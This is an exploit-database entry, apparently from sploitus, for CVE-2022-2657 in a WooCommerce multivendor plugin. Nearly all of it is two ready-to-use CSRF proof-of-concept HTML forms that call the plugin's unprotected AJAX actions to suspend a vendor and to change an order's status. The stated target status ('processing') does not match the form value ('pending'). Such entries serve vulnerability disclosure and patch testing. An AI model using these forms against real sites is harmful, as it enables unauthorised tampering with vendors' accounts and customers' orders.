Exploit for Multivendor Marketplace Solution for WooCommerce < 3.8.12 - Unauthorised AJAX Calls CVE-2022-2657

Name: Exploit for Multivendor Marketplace Solution for WooCommerce < 3.8.12 - Unauthorised AJAX Calls CVE-2022-2657
Rating: 5 (144 reviews)

2022-08-15 | CVSS 0.8

## https://sploitus.com/exploit?id=WPEX-ID:C600DD04-F6AA-430B-AEFB-C4C6D554C41A
To suspend a vendor, open this as any authenticated user, or via a CSRF against any logged in one

<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php?action=wcmp_suspend_vendor" method="POST" enctype="multipart/form-data">
<input type="hidden" name="user_id" value="3">
<input type="hidden" name="redirect" value="true">
<input type="submit" name="Submit">
</form>
</body>
</html>

To update the order status of the order with ID 2 to processing:

<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php?action=wcmp_order_status_changed" method="POST">
<input type="text" name="order_id" value="2">
<input type="text" name="selected_status" value="pending">
<input type="submit" name="Submit" value="Submit">
</form>
</body>
</html>